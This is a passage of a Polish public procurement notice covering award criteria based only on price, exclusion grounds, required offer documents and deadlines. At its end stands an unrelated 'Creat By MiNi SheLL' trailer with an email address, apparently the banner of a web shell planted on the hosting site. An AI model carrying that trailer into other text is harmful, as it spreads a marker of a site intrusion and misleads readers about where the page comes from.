zamówienia to całkowita wartość przedmiotu zamówienia wraz z kwotą podatku VAT (suma wartości netto i wartości podatku VAT) wg podanej ilości asortymentu w okresie realizacji umowy. Stanowi ona podstawę oceny ofert (w zakresie każdej z części zamówienia).<br/>10. Cenę za wykonanie przedmiotu zamówienia (tj. wartość brutto zamówienia dla danej części) należy skalkulować przy pomocy Formularza cenowego – załącznik odpowiednio nr 3a lub 3b do SWZ oraz przedstawić w Formularzu ofertowym ̶ załącznik nr 1 do SWZ.<br/>11. Formularz cenowy – załącznik nr 3a i 3b do SWZ udostępniany jest przez Zamawiającego w wersji edytowalnej (MS Excel). Wykonawca uzupełnia puste pola w następujący sposób:<br/>„Cena netto” – należy wpisać cenę jednostkową netto;<br/>Pozostałe wartości powinny zostać obliczone automatycznie, ale wskazane jest sprawdzenie i ewentualne skorygowanie poprawności przeprowadzonej kalkulacji ceny oferty.<br/>12. Podstawę oceny i porównania ofert stanowi cena brutto za wykonanie zamówienia, wpisana w formularzu ofertowym (załącznik nr 1 do SWZ) na podstawie ceny przedstawionej/wyliczonej w formularzu cenowym (załącznik nr 3a lub/i 3b do SWZ) w zakresie każdej z części zamówienia.<br/>13. Przy wyliczaniu poszczególnych wartości netto i brutto należy ograniczyć się do dwóch miejsc po przecinku na każdym etapie wyliczenia ceny. Kwoty wykazane w ofercie zaokrągla się do pełnych groszy, przy czym końcówki poniżej 0,5 grosza pomija się, a końcówki 0,5 grosza i wyższe zaokrągla się do 1 grosza.<br/>14. W przypadku rozbieżności cen w formularzu cenowym i ofertowym Zamawiający do oceny i porównania ofert przyjmie, że Wykonawca oferuje wykonanie zamówienia za cenę wpisaną/wyliczoną w formularzu cenowym.<br/>15. Za najkorzystniejszą zostanie uznana oferta, która uzyska największą sumę punktów w oparciu o ustalone kryterium cena 100%.<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 100. Pozostałe oferty zostaną przeliczone według wzoru w SWZ. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/>16. Oferta, która otrzyma najwięcej punktów w kryterium „cena oferty” zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>17. Jeżeli wybór najkorzystniejszej oferty będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie Zamawiający wezwie Wykonawców do złożenia oferty dodatkowej.<br/>18. Brak określenia w ofercie ceny spowoduje odrzucenie oferty jako niezgodnej z treścią SWZ. Brak formularza cenowego, załączonego do oferty spowoduje odrzucenie oferty Wykonawcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający wykluczy z postępowania Wykonawców, wobec których zachodzą podstawy wykluczenia, o których mowa w art. 108 ust. 1 ustawy Pzp.<br/>2. W zakresie części 3 - 5 zamówienia Zamawiający wykluczy z postępowania Wykonawców, wobec których zachodzą podstawy wykluczenia, o których mowa w art. 109 ust. 1 pkt 7 ustawy Pzp.<br/>3. Zamawiający działając na podstawie ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835) zw. dalej s.r.z.p.w.a.U. wykluczy z postępowania Wykonawców, wobec których zachodzą podstawy wykluczenia określone w art. 7 ust. 1 tej ustawy. Na potwierdzenie braku opisanych w art. 7 ustawy podstaw wykluczenia Wykonawca obowiązany jest złożyć wraz z ofertą oświadczenie odpowiadające treścią załącznikowi nr 2 do SWZ.<br/>4. Działając na podstawie art. 110 ust. 2 ustawy Pzp, Wykonawca może zastosować tzw. „procedurę samooczyszczenia”. Pomimo wystąpienia wskazanych w przepisie podstaw wykluczenia, Wykonawca może wykazać swoją rzetelność poprzez udowodnienie Zamawiającemu, iż zostały przez niego podjęte czynności naprawcze.<br/>5. Zamawiający oceni, czy podjęte przez Wykonawcę czynności wskazane wyżej w ust. 4 są wystarczające do wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu Wykonawcy. Jeżeli podjęte przez Wykonawcę czynności, o których mowa w ust. 4 nie są wystarczające do wykazania jego rzetelności, Zamawiający wykluczy Wykonawcę.<br/>6. Wykonawca może zostać wykluczony przez Zamawiającego na każdym etapie postępowania o udzielenie zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie spełnienia warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta składana w niniejszym postępowaniu, jest zobowiązaniem Wykonawcy do zgodnego z oczekiwaniami Zamawiającego (opisanymi w dokumentach zamówienia) oraz na warunkach określonych we wzorze umowy – załącznik nr 4 do SWZ, wykonania zamówienia publicznego za cenę skalkulowaną przez Wykonawcę.<br/>2. Wykonawca składa wraz z ofertą następujące dokumenty i załączniki:<br/>2.1. formularz ofertowy zgodnie ze wzorem – załącznik nr 1 do SWZ;<br/>2.2. oświadczenie stanowiące potwierdzenie, że Wykonawca nie podlega wykluczeniu i odpowiednio spełnia warunki udziału w postępowaniu przygotowane zgodnie ze wzorem – załącznik nr 2 do SWZ;<br/>oświadczenie, stanowiące załącznik nr 2 do SWZ (jeśli dotyczy) składa także odrębnie każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia; w takim przypadku oświadczenie potwierdza brak podstaw wykluczenia i odpowiednio spełnianie warunków udziału w postępowaniu tego Wykonawcy w postępowaniu;<br/>2.3. formularz cenowy zgodnie ze wzorem z załącznika 3a (cz.1,2) lub 3b (cz. 3,4,5) do SWZ- w zależności na którą część zamówienia Wykonawca składa ofertę.<br/>2.4. pełnomocnictwo osób podpisujących ofertę, o ile nie wynika ono z przepisów prawa lub innych dokumentów - jeśli dotyczy;<br/>2.5. pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – w przypadku składania oferty wspólnie przez Wykonawców.<br/>3. Oferta powinna być sporządzona w języku polskim. Jeżeli dokumenty składane wraz z ofertą są wystawione w języku obcym, Wykonawca obligatoryjnie załącza do oferty ich tłumaczenie.<br/>4. Treść i forma złożenia oferty musi odpowiadać warunkom zamówienia, określonym przez Zamawiającego w niniejszym dokumencie i załącznikach. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu lub do reprezentowania ich w postępowaniu oraz zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. Oświadczenia potwierdzające brak podstaw wykluczenia – wg załącznika nr 2 każdy z Wykonawców składa osobno.<br/>3. Jeżeli oferta Wykonawców, o których mowa w niniejszym rozdziale zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy przewiduje wzór umowy -załącznik nr 4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy zakupowej SmartPzp dostępnej na stronie internetowej w zakładce przedmiotowego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-20 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie nakłada obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy/podwykonawcom.<br/>2. Postanowienia w sprawie dokumentów zastrzeżonych:<br/>-Wszystkie dokumenty złożone w prowadzonym postępowaniu są jawne, za wyjątkiem informacji zastrzeżonych na podstawie art. 18 ust. 3 ustawy Pzp przez składającego ofertę.<br/>-Dokumenty zastrzeżone Wykonawca wydziela (umieszczając je w osobnym pliku) i oznacza jako „TAJEMNICA PRZEDSIĘBIORSTWA”. Brak jednoznacznego wskazania, które informacje stanowią tajemnicę przedsiębiorstwa oznacza, że wszelkie składane oświadczenia i przedłożone dokumenty są jawne bez zastrzeżeń.<br/>3. Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego, profilu zaufanego lub podpisu osobistego (warstwa elektroniczna na dowodzie osobistym, tzw. e-dowód). Portal e-Usług SmartPZP jest kompatybilny ze wszystkimi podpisami elektronicznymi.<br/>4. Każdy Wykonawca samodzielnie lub jako Wykonawca wspólnie ubiegający się o zamówienie ma prawo złożyć tylko jedną ofertę. Dopuszczalne jest wycofanie oferty lub jej zmiana przed upływem terminu składania ofert.<br/>5. Zamawiający nie przewiduje aukcji elektronicznej.<br/>6. Zamawiający nie przewiduje złożenia oferty w postaci katalogów elektronicznych lub dołączenia katalogu elektronicznego do oferty.<br/>7. Zamawiający nie przewiduje rozliczeń w walutach obcych.<br/>8. Zamawiający nie przewiduje zwrotu kosztów postępowania.<br/>9. Zamawiający nie prowadzi postępowania w celu zawarcia umowy ramowej.<br/>10. Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie przez Wykonawców, o których mowa w art. 94 ustawy Pzp (m.in. zakłady pracy chronionej, spółdzielnie socjalne, itp.).<br/>11. Zamawiający nie przewiduje wymagań w zakresie zatrudnienia, o którym mowa w art. 95 ustawy Pzp.<br/>12. Zamawiający nie dopuszcza składania ofert wariantowych.<br/>13. Zamawiający nie przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 Pzp (zamówienie z wolnej ręki).<br/>14. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.<br/>15. Zamawiający nie określa dodatkowych wymagań związanych z realizacją zamówienia w zakresie zatrudnienia, o których mowa w art. 96 ustawy Pzp.<br/>16. Zamawiający nie przewiduje żądania wadium w postępowaniu.<br/>17. Pozostałe informacje dotyczące postępowania oraz przedmiotu zamówienia znajdują się w SWZ i w załącznikach do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com